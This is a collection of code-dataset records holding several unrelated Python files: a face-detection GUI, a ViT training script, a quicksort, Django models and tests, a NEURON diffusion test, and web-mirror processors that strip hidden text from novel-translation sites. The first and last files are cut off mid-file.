16)\n\t\tself.load_img(new_nr)\n\n\tdef load_img(self, nr):\n\t\tself.nr = nr\n\t\tself.nr_zdj_text.text = f'Aktualne zdjęcie: {nr}'\n\t\tself.img_inp.source = f'./Image_Input/{nr}.jpg'\n\t\tself.img_inp.reload()\n\n\tdef change_mode(self, tryb):\n\t\tself.tryb_text.text = f'Tryb: {tryb.upper()}'\n\t\tself.mode = tryb\n\n\tdef detect_faces(self):\n\t\timg = cv2.imread(self.img_inp.source)\n\t\tgray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tface_cascade = cv2.CascadeClassifier(f'cascades/data/haarcascade_frontalface_{self.mode}.xml')\n\t\tcolor = (0, 255, 0)\n\t\tface_rects = face_cascade.detectMultiScale(\n\t\t\tgray_img, scaleFactor=1.2, minNeighbors=3, minSize=(32, 32))\n\t\tif len(face_rects):\n\t\t\tfor faceRect in face_rects:\n\t\t\t\tx, y, w, h = faceRect\n\t\t\t\tcv2.rectangle(img, (x, y), (x + h, y + w), color, 2)\n\n\t\tcv2.imshow('image', img)\n\n\nclass WindowManager(ScreenManager):\n\tpass\n\n\nkv = Builder.load_file('ui.kv')\n\n\nclass FaceRecApp(App):\n\tdef build(self):\n\t\treturn kv\n\n\nif __name__ == \"__main__\":\n\tFaceRecApp().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"210610445","text":"import sys\nimport os\nsys.path.append(os.path.dirname(os.getcwd()))\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn.functional as F\nimport wandb\nfrom tqdm import tqdm\nfrom datetime import datetime\nimport pickle\n\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau, MultiStepLR\nfrom torch.utils.data import DataLoader\n\nimport config\nfrom config import TrainConfigViT as Config, BASE_DIR, GPU_ID\nfrom dataio.dataloader import probe_data_folder, BraTS18Binary\nfrom train_utils import log_stats_classification, write_stats_classification\nfrom loss import TauKLDivLoss, MarginalPenaltyLoss, MarginalsExtendedLoss\nfrom models.resnet import get_resnet50_attn_classifier\nfrom models.unet import get_unet_regressor, get_unet_encoder_classifier\n\n# Ignore pytorch warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = GPU_ID\n\nfrom timm.models.vision_transformer import _create_vision_transformer\n\ndef train(seed=None):\n raw_params = Config()\n # Serialize transforms\n train_transforms = raw_params.config.pop(\"train_transforms\")\n test_transforms = raw_params.config.pop(\"test_transforms\")\n raw_params.config[\"train_transforms\"] = {\"transforms\": train_transforms.__str__()}\n raw_params.config[\"test_transforms\"] = {\"test_transforms\": test_transforms.__str__()}\n\n params = raw_params.config\n\n # Set seed\n if seed is not None:\n params[\"seed\"] = seed\n random.seed(params[\"seed\"])\n np.random.seed(params[\"seed\"])\n torch.manual_seed(params[\"seed\"])\n\n wandb.init(project='regex',\n entity='tomron27',\n job_type=\"eval\",\n reinit=True,\n config=params,\n notes=params[\"name\"],\n group=params[\"group\"])\n\n train_metadata, val_metadata, class_counts = probe_data_folder(params[\"data_path\"],\n train_frac=params[\"train_frac\"],\n bad_files=params[\"bad_files\"],\n subsample_frac=params[\"subsample_frac\"],\n count_classes=True)\n ### DEBUG\n # train_metadata, val_metadata = train_metadata[:128], val_metadata[:128]\n\n # Datasets\n train_dataset = BraTS18Binary(params[\"data_path\"],\n train_metadata,\n transforms=train_transforms,\n shuffle=True,\n random_state=params[\"seed\"],\n prefetch_data=params[\"prefetch_data\"])\n val_dataset = BraTS18Binary(params[\"data_path\"],\n val_metadata,\n transforms=test_transforms,\n prefetch_data=params[\"prefetch_data\"],\n shuffle=False)\n\n # Dataloaders\n train_loader = DataLoader(dataset=train_dataset,\n num_workers=params[\"num_workers\"],\n pin_memory=True,\n batch_size=params[\"batch_size\"])\n val_loader = DataLoader(dataset=val_dataset,\n num_workers=params[\"num_workers\"],\n pin_memory=True,\n batch_size=params[\"batch_size\"],\n shuffle=False)\n\n vit_params = {\n \"pretrained\": params[\"pretrained\"],\n \"img_size\": params[\"spatial_dim\"],\n \"patch_size\": params[\"patch_size\"],\n \"in_chans\": params[\"channels\"],\n \"num_classes\": params[\"num_classes\"],\n \"embed_dim\": params[\"dim\"],\n \"depth\": params[\"depth\"],\n }\n model = _create_vision_transformer(\"vit_base_patch16_224\", **vit_params)\n total_params = sum(p.numel() for p in model.parameters())\n trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(\"Total parameters: {}\\nTotal trainable parameters: {}\".format(total_params, trainable_params))\n\n # Create log dir\n log_dir = os.path.join(params[\"log_path\"], params[\"name\"], datetime.now().strftime(\"%Y%m%d_%H:%M:%S\"))\n os.makedirs(log_dir)\n print(\"Log dir: '{}' created\".format(log_dir))\n pickle.dump(params, open(os.path.join(log_dir, \"params.p\"), \"wb\"))\n\n # CUDA\n device = torch.device(\"cuda\" if torch.cuda.is_available() and params[\"use_gpu\"] else \"cpu\")\n model = model.to(device)\n\n # Loss\n # criterion = torch.nn.MSELoss()\n criterion = torch.nn.CrossEntropyLoss()\n # criterion = TauKLDivLoss(attn_kl=params[\"attn_kl\"],\n # kl_weight=params[\"kl_weight\"],\n # detach_targets=params[\"detach_targets\"])\n # criterion = MarginalPenaltyLoss(attn_kl=params[\"attn_kl\"], kl_weight=params[\"kl_weight\"])\n # criterion = MarginalsExtendedLoss(attn_kl=params[\"attn_kl\"], kl_weight=params[\"kl_weight\"], detach_targets=params[\"detach_targets\"],)\n\n # Optimizer\n optimizer = torch.optim.Adam(model.parameters(), lr=params[\"lr\"])\n scheduler = ReduceLROnPlateau(optimizer, mode='min',\n factor=params[\"optim_factor\"],\n patience=params[\"optim_step\"],\n min_lr=1e-6,\n verbose=True)\n\n # Training\n best_val_score = 0.0\n save_dir = os.path.join(params[\"log_path\"], \"val_results\")\n os.makedirs(save_dir, exist_ok=True)\n for epoch in range(params[\"num_epochs\"]):\n train_stats, val_stats = {}, {}\n for fold in ['train', 'val']:\n print(f\"*** Epoch {epoch + 1} {fold} fold ***\")\n if fold == \"train\":\n model.train()\n for i, sample in tqdm(enumerate(train_loader), total=len(train_loader)):\n images, targets = sample\n images, targets = images.to(device, non_blocking=True), targets.to(device, non_blocking=True)\n outputs = model(images)\n if torch.isnan(outputs).any():\n print(\"Oops\")\n # losses = criterion(outputs, targets, marginals)\n # loss = losses[-1]\n loss = criterion(outputs, targets)\n losses = (loss,)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n current_lr = optimizer.param_groups[0]['lr'] if scheduler is not None else params[\"lr\"]\n log_stats_classification(train_stats, outputs, targets, losses, batch_size=params[\"batch_size\"],\n lr=current_lr)\n\n else:\n model.eval()\n with torch.no_grad():\n for i, sample in tqdm(enumerate(val_loader), total=len(val_loader)):\n images, targets = sample\n images, targets = images.to(device, non_blocking=True), targets.to(device, non_blocking=True)\n outputs = model(images)\n if torch.isnan(outputs).any():\n print(\"Oops\")\n loss = criterion(outputs, targets)\n losses = (loss,)\n current_lr = optimizer.param_groups[0]['lr'] if scheduler is not None else params[\"lr\"]\n log_stats_classification(val_stats, outputs, targets, losses, batch_size=params[\"batch_size\"],\n lr=current_lr)\n val_loss, val_score = write_stats_classification(train_stats, val_stats, epoch,\n ret_metric=params[\"save_metric\"])\n\n # progress LR scheduler\n if scheduler is not None:\n scheduler.step(val_loss)\n\n # Save parameters\n if val_score >= best_val_score and epoch >= params[\"min_epoch_save\"]:\n model_file = os.path.join(log_dir,params[\"name\"] + f'__best__epoch={epoch + 1:03d}_score={val_score:.4f}.pt')\n print(f'Model improved {params[\"save_metric\"]} from {best_val_score:.4f} to {val_score:.4f}')\n print(f'Saving model at \\'{model_file}\\' ...')\n torch.save(model.state_dict(), model_file)\n best_val_score = val_score\n wandb.run.summary[\"best_val_score\"] = best_val_score\n\n if params[\"chekpoint_save_interval\"] > 0:\n if epoch % params[\"chekpoint_save_interval\"] == 0 and epoch >= params[\"min_epoch_save\"]:\n model_file = os.path.join(log_dir,\n params[\"name\"] + f'__ckpt__epoch={epoch + 1:03d}_score={val_score:.4f}.pt')\n print(f\"Saving model at '{model_file}' ...\")\n torch.save(model.state_dict(), model_file)\n\n\nif __name__ == \"__main__\":\n # train()\n # for lamb in [0.1, 0.5]:\n # for lamb in [1e-4, 1e-3, 1e-2, 1e-1]:\n # train(lamb)\n # models = 5\n for i in range(5):\n print(f\"********** Ensemble iteration {i+1:02d} **********\")\n train(seed=i)\n","sub_path":"train_vit.py","file_name":"train_vit.py","file_ext":"py","file_size_in_byte":9258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"531299678","text":"def find_median(A):\n k = len(A) - len(A)//2 - 1\n maximum = max(A[0], A[k], A[-1])\n minimum = min(A[0], A[k], A[-1])\n if A[0] == maximum:\n if A[k] > A[-1]:\n return k\n return len(A)-1\n if A[0] == minimum:\n if A[k] > A[-1]:\n return len(A)-1\n return k\n return 0\n\n\ndef get_pivot(A, p):\n '''for array A, given pivot option, return the index of the pivot element'''\n if p == 'first':\n return(0)\n elif p == 'last':\n return len(A)-1\n elif p == 'middle':\n return find_median(A)\n else:\n print('wrong input. Pivot option should be \"first\", \"last\", or \"middle\"')\n quit()\n\n\ndef partition(A, pivot):\n pivot_value = A[pivot] # get the index of pivot choice\n A[0], A[pivot] = A[pivot], A[0]\n i, j = 1, 1\n # i: the next one to exam, j: the first partitioned element to the right\n while i < len(A):\n if A[i] < pivot_value:\n A[i], A[j] = A[j], A[i]\n j+=1\n i+=1\n A[0], A[j-1] = A[j-1], A[0]\n return A, j-1\n\n\ndef quick_sort(A, p):\n if len(A) == 1:\n return A, 0\n pivot = get_pivot(A, p)\n A, pivot_position = partition(A,pivot)\n if pivot_position != 0:\n A[:pivot_position], l_comp = quick_sort(A[:pivot_position], p)\n else:\n l_comp = 0\n if pivot_position != len(A)-1:\n A[pivot_position+1:], r_comp = quick_sort(A[pivot_position+1:], p)\n else:\n r_comp =0\n\n return A, l_comp + r_comp +len(A)-1\n\n\nwith open('QuickSort.txt') as f:\n A = [int(num) for num in f]\n\nsorted, comp = quick_sort(A, 'middle')\nprint(comp)\n","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"297290030","text":"from django.conf import settings # Using User\nfrom django.db import models\nfrom django.db.models.signals import pre_save, post_save\nfrom django.db.models import Q\nfrom .utils import unique_slug_generator\nfrom .validators import validate_category\nfrom django.core.urlresolvers import reverse\n\nUser = settings.AUTH_USER_MODEL\n# Create your models here.\nclass RestaurantLocationQuerySet(models.query.QuerySet):\n def search(self, query):\n if query:\n query = query.strip() # 공백 없애기\n return self.filter(\n Q(name__icontains=query)|\n Q(location__icontains=query)|\n Q(category__icontains=query)|\n Q(category__iexact=query)|\n Q(location__iexact=query)|\n Q(item__contents__icontains=query)\n ).distinct()\n return self\n\nclass RestaurantLocationManager(models.Manager):\n def get_queryset(self):\n return RestaurantLocationQuerySet(self.model, using=self._db)\n\n def search(self, query):\n return self.get_queryset().filter(name__icontains=query)\n\nclass RestaurantLocation(models.Model):\n owner = models.ForeignKey(User) # django models unleashed # class_instance.model_set.all()\n name = models.CharField(max_length=120)\n location = models.CharField(max_length=120, null=True, blank= True)\n category = models.CharField(max_length=120, null=True, blank=False, validators = [validate_category])\n timestamp = models.DateTimeField(auto_now_add=True)\n #my_date_field = models.DateField(auto_now=False, auto_now_add=False)\n slug = models.SlugField(blank=True, null=True)\n\n objects = RestaurantLocationManager() # add Model.objects.all\n\n def __str__(self):\n return self.name\n\n @property\n def title(self):\n return self.name # obj.title\n def get_absolute_url(self):\n return reverse('restaurent:detail', kwargs={'slug':slug} ) # you can send parameter slug to urls.py, views.py\n\ndef rl_pre_save_receiver(sender, instance, *args, **kwargs):\n print('saving...')\n print(instance.timestamp)\n if not instance.name:\n instance.name = \"Another Name\"\n #if not instance.slug:\n # instance.slug = unique_slug_generator(instance)\n instance.category = instance.category.capitalize()\n\ndef rl_post_save_receiver(sender, instance, *args, **kwargs):\n print('saved...')\n print(instance.timestamp)\n\npre_save.connect(rl_pre_save_receiver, sender = RestaurantLocation)\npost_save.connect(rl_post_save_receiver, sender = RestaurantLocation)\n","sub_path":"restaurant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"366021316","text":"\"\"\"test of pure diffusion with cvode\n\nRobert A McDougal\nMarch 2013 - June 2014\n\"\"\"\n\nfrom neuron import h, crxd as rxd\n\nimport numpy\nimport __main__\n\nname = __main__.__file__\nif name[-3:] == \".py\":\n name = name[:-3]\n\nh.load_file(\"stdrun.hoc\")\n\ndend = h.Section()\ndend.diam = 2\ndend.nseg = 101\ndend.L = 100\n\ndiff_constant = 1\n\nr = rxd.Region(h.allsec())\nca = rxd.Species(\n r, d=diff_constant, initial=lambda node: 1 if 0.4 < node.x < 0.6 else 0\n)\n\n# enable CVode and set atol\nh.CVode().active(1)\nh.CVode().atol(1e-6)\n\nh.finitialize()\n\nif __name__ == \"__main__\":\n from matplotlib import pyplot\n\n for t in [25, 50, 75, 100, 125]:\n h.continuerun(t)\n pyplot.plot([seg.x for seg in dend], ca.states)\n\n pyplot.tight_layout()\n pyplot.savefig(\"{0}.png\".format(name))\nelse:\n for t in [25, 50, 75, 100, 125]:\n h.continuerun(t)\n","sub_path":"share/lib/python/neuron/rxdtests/tests/pure_diffusion_cvode.py","file_name":"pure_diffusion_cvode.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"586025005","text":"\nimport re\nimport tinycss2\n\nfrom . import HtmlProcessor\n\n########################################################################################################################\n#\n#\tMisc fixer classes for various retarded \"protection\" shit translators do.\n#\n########################################################################################################################\n\n\n\nclass HecatesCornerPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\tloggerPath = \"Main.Text.HecatesCorner\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://(?:www\\.)?hecatescorner\\.wordpress\\.com\", url):\n\t\t\tprint(\"hecatescorner Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"hecatescorner doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?#ffffff\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\n\nclass ZenithNovelsPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.ZenithNovels\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://(?:www\\.)?zenithnovels\\.com\", url):\n\t\t\tprint(\"zenith novels Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"zenith novels doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?white\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass LightNovelsWorldPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.LightNovelsWorld\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://(?:www\\.)?lightnovels\\.world\", url):\n\t\t\tprint(\"lnw Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?white\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\n\nclass ShamelessOniisanPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.ShamelessOniisan\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://shamelessoniisan\\.wordpress\\.com\", url):\n\t\t\tprint(\"wwsd Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?#ffffff\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass WatashiWaSugoiDesuPageProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.WatashiWaSugoiDesu\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://watashiwasugoidesu\\.wordpress\\.com\", url):\n\t\t\tprint(\"wwsd Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?#ffffff\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass FantasyBooksLiveProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.FantasyBooksLive\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://fantasy\\-books\\.live\", url):\n\t\t\tprint(\"fbl Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadlinks = soup.find_all('a', href=\"https://fantasy-books.live/approved-list\")\n\t\tfor bad in badlinks:\n\n\t\t\tbad.parent.decompose()\n\n\t\tbadspans = soup.find_all(\"div\", text=re.compile(r\"https://fantasy\\-books\\.live/approved\\-list then this work has been stolen\", re.I))\n\t\tfor bad in badspans:\n\t\t\tprint('baddiv', bad)\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass MayonaizeShrimpLiveProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.MayonaizeShrimp\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tif re.search(r\"^https?://mayonaizeshrimp\\.wordpress\\.com/\", url):\n\t\t\tprint(\"ms Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef preprocessBody(self, soup):\n\n\t\t# Decompose the annoying inline shit.\n\t\t# ex: the truth is out!\n\t\tbadspans = soup.find_all(\"span\", style=re.compile(r\"color\\W?:\\W?#ffffff\", re.I))\n\t\tfor bad in badspans:\n\t\t\tbad.decompose()\n\n\t\treturn soup\n\nclass RebirthOnlineLiveProcessor(HtmlProcessor.HtmlPageProcessor):\n\n\twanted_mimetypes = ['text/html']\n\twant_priority = 80\n\n\n\tloggerPath = \"Main.Text.MayonaizeShrimp\"\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\n\t\tif re.search(r\"^https?://(www\\.)?rebirth\\.online/\", url):\n\t\t\tprint(\"ms Wants url: '%s'\" % url)\n\t\t\treturn True\n\t\t# print(\"lnw doesn't want url: '%s'\" % url)\n\t\treturn False\n\n\tdef process_css_block(self, css_text):\n\n\t\tss = tinycss2.parse_stylesheet(css_text, skip_whitespace=True, skip_comments=True)\n\t\t# print(ss)\n\n\t\tbad_classes = []\n\n\t\tssf = [tmp for tmp in ss if tmp.type == \"qualified-rule\"]\n\t\tfor rule in ssf:\n\t\t\tprelude = rule.prelude\n\t\t\tcontent = rule.content\n\t\t\tprelude = [tmp for tmp in prelude if tmp.type != 'whitespace']\n\t\t\tcontent = [tmp for tmp in content if tmp.type != 'whitespace']\n\t\t\tif (\n\t\t\t\t\tlen(prelude) == 2 and\n\t\t\t\t\tprelude[0].type == \"literal\" and\n\t\t\t\t\tprelude[1].type == \"ident\" and\n\t\t\t\t\tprelude[0].value == \".\" and\n\t\t\t\t\tlen(content) == 4 and\n\t\t\t\t\tcontent[0].type == \"ident\" and\n\t\t\t\t\tcontent[1].type == \"literal\" and\n\t\t\t\t\tcontent[2].type == \"ident\" and\n\t\t\t\t\tcontent[3].type == \"literal\" and\n\t\t\t\t\tcontent[0].lower_value == \"display\" and\n\t\t\t\t\tcontent[2].lower_value == \"none\"\n\t\t\t\t):\n\n\t\t\t\tbad_class = prelude[1].value\n\n\t\t\t\tbad_classes.append(bad_class)\n\t\treturn bad_classes\n\n\tdef preprocessBody(self, soup):\n\t\tstyles = soup.find_all('style')\n\t\tdecomp_classes = []\n\t\tfor style in styles:\n\t\t\tif not style.get_text():\n\t\t\t\tcontinue\n\n\t\t\tnew = self.process_css_block(style.get_text())\n\n\t\t\tdecomp_classes.extend(new)\n\n\t\t# Decompose the annoying inline shit.\n\t\tfor bad_class in decomp_classes:\n\t\t\tbad_p = soup.find_all(\"p\", class_=bad_class)\n\t\t\tfor bad in bad_p:\n\t\t\t\tbad.decompose()\n\n\t\treturn soup\n\n\n","sub_path":"WebMirror/processor/GarbageInlineProcessors.py","file_name":"GarbageInlineProcessors.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"18443073","text":"#!/usr/bin/env python\r\n\r\nimport sys\r\nfrom openpyxl import load_workbook\r\n\r\ndef fix_text(s):\r\n return '' if s is None else s.replace('\\n', '').strip()\r\n\r\nwb = load_workbook(sys.argv[1])\r\nsheet = wb.get_sheet_by_name('amtl.Index 2017 ATC sortiert')\r\n\r\nfor i in range(1, sheet.max_row + 1):\r\n atc = sheet.cell(row=i, column=1).value\r\n name = sheet.cell(row=i, column=3).value\r\n ddd = sheet.cell(row=i, column=5).value\r\n if atc is not None:\r\n print('\"%s\",\"%s\",\"%s\"' % (fix_text(atc), fix_text(name), fix_text(ddd)))\r\n","sub_path":"src/atc_excel2csv.py","file_name":"atc_excel2csv.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626826812","text":"from django.test import TestCase, tag\nfrom django.urls import reverse\nfrom mixer.backend.django import mixer\n\nfrom blog.models import Article, Profile \n\n\nclass ArticleListViewTests(TestCase):\n def test_no_articles(self):\n response = self.client.get(reverse('article_list'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blog/article_list.html')\n self.assertContains(response, 'No articles available yet.')\n\n def test_one_article_published(self):\n \"\"\"\n The view returns the single article even if its the only published\n article.\n \"\"\"\n article = mixer.blend('blog.article', publish=True)\n response = self.client.get(reverse('article_list'))\n self.assertQuerysetEqual(\n response.context['articles'],\n [f'']\n )\n\n def test_three_published_and_two_unpublished_articles(self):\n \"\"\"\n The `ArticleListView only displays published articles.\n \"\"\"\n pub_article1 = mixer.blend('blog.article', title='Published Article 1', publish=True)\n unpub_article1 = mixer.blend('blog.article', title='Unpublished Article 1')\n pub_article2 = mixer.blend('blog.article', title='Published Article 2', publish=True)\n unpub_article2 = mixer.blend('blog.article', title='Unpublished Article 2')\n pub_article3 = mixer.blend('blog.article', title='Published Article 3', publish=True)\n response = self.client.get(reverse('article_list'))\n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n len(response.context['articles']),\n 3\n )\n\n def test_search_if_query_exists(self):\n query = 'python'\n article1 = mixer.blend('blog.article', title='Web dev with Python', publish=True)\n article2 = mixer.blend('blog.article', title='Javascript for beginners', publish=True)\n article3 = mixer.blend('blog.article', title='Build a web app with python and django', publish=True)\n response = self.client.get(reverse('article_list') + '?query=' + query)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n len(response.context['articles']),\n 2\n ) \n\n\nclass ArticleDetailViewTests(TestCase):\n def test_unpublished_article(self):\n \"\"\"\n HTTP 404 Not Found is raised when a detail page for an \n unpublished article is requested.\n \"\"\"\n article = mixer.blend('blog.article')\n url = reverse('article_detail', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 404)\n\n def test_published_article(self):\n \"\"\"\n Article details are displayed when a detail page of a\n published article is requested.\n \"\"\"\n article = mixer.blend('blog.article', publish=True)\n url = reverse('article_detail', args=(article.slug, ))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, article.title)\n self.assertTemplateUsed(response, 'blog/article_detail.html')\n\n def test_detail_page_displays_profile_of_article_author(self):\n article = mixer.blend('blog.article', publish=True)\n url = reverse('article_detail', args=(article.slug, ))\n response = self.client.get(url)\n self.assertTemplateUsed(response, 'blog/profile.html')\n\n\nclass DashboardViewTests(TestCase):\n def test_dashboard_page_for_unauthenticated_user(self):\n \"\"\"\n Unauthenticated users cannot have access to dashboard page.\n \"\"\"\n response = self.client.get(reverse('dashboard'))\n self.assertNotEqual(response.status_code, 200)\n # unauthenticated users are redirected to the login page\n self.assertEqual(response.status_code, 302) \n\n def test_dashboard_page_for_authenticated_user(self):\n \"\"\"\n Authenticated users access their dashboard page.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n response = self.client.get(reverse('dashboard'))\n self.assertEqual(response.status_code, 200) \n self.assertTemplateUsed(response, 'blog/dashboard.html')\n \n def test_dashboard_page_displays_all_user_articles(self):\n \"\"\"\n Authenticated users can view all their articles (both published and \n unpublished) in their dashboard page.\n \"\"\"\n user = mixer.blend('auth.User')\n\n article1 = mixer.blend('blog.article', author=user)\n article2 = mixer.blend('blog.article', author=user, publish=True)\n article3 = mixer.blend('blog.article', author=user)\n article4 = mixer.blend('blog.article', author=user, publish=True)\n article5 = mixer.blend('blog.article', author=user, publish=True)\n\n self.client.force_login(user)\n response = self.client.get(reverse('dashboard'))\n self.assertContains(response, article1.title)\n self.assertContains(response, article2.title)\n self.assertContains(response, article3.title)\n self.assertContains(response, article4.title)\n self.assertContains(response, article5.title)\n\n def test_dashboard_displays_user_profile(self):\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n response = self.client.get(reverse('dashboard'))\n self.assertTemplateUsed(response, 'blog/profile.html')\n\n\nclass AddArticleView(TestCase):\n def test_unauthenticated_user(self):\n \"\"\"\n Unauthenticated users cannot create articles so they are\n redirected to the login page first.\n \"\"\"\n response = self.client.get(reverse('create_article'))\n self.assertEqual(response.status_code, 302)\n\n def test_authenticated_user(self):\n \"\"\"\n Authenticated users can create articles.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n response = self.client.get(reverse('create_article'))\n self.assertEqual(response.status_code, 200)\n\n def test_form_valid(self):\n \"\"\"\n A valid form submitted results in a new article.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n data = {\n \"title\": \"New Article\",\n \"content\": \"Fresh content\"\n }\n url = reverse('create_article')\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, 302) # successful post request returns a redirect\n self.assertEqual(Article.objects.count(), 1)\n\n def test_invalid_data(self):\n \"\"\"\n An invalid form does not create a new article.\n \"\"\"\n user = mixer.blend('auth.User')\n self.client.force_login(user)\n data = {\n \"title\": \"New Article\",\n }\n url = reverse('create_article')\n response = self.client.post(url, data)\n self.assertNotEqual(response.status_code, 302) # unsuccessful post request returns same page\n self.assertEqual(Article.objects.count(), 0)\n\n\nclass EditProfileViewTests(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.user = mixer.blend('auth.User')\n cls.url = reverse('profile_update', args=(cls.user.profile.pk,))\n\n def test_retrieve_a_profile(self):\n \"\"\"\n The view retreives a `Profile` object.\n \"\"\"\n response = self.client.get(self.url)\n self.assertEqual(\n str(response.context['profile']),\n f'Profile, {self.user.username}'\n )\n\n def test_authenticated_user(self):\n \"\"\"\n Authenticated users can access the edit profile page.\n \"\"\"\n self.client.force_login(self.user)\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n\n def test_authenticated_user_can_update_profile(self):\n self.client.force_login(self.user)\n old_profile = self.user.profile\n data = {\n 'user': self.user,\n 'full_name': 'Test User',\n }\n response = self.client.post(self.url, data)\n new_profile = Profile.objects.get(user=self.user)\n \n self.assertNotEqual(old_profile.full_name, new_profile.full_name)\n self.assertEqual(response.status_code, 302)\n \n\nclass UpdateArticleViewTests(TestCase):\n def test_article_updates(self):\n article = mixer.blend('blog.article')\n url = reverse('article_update', args=(article.slug,))\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, 200)\n data = {\n 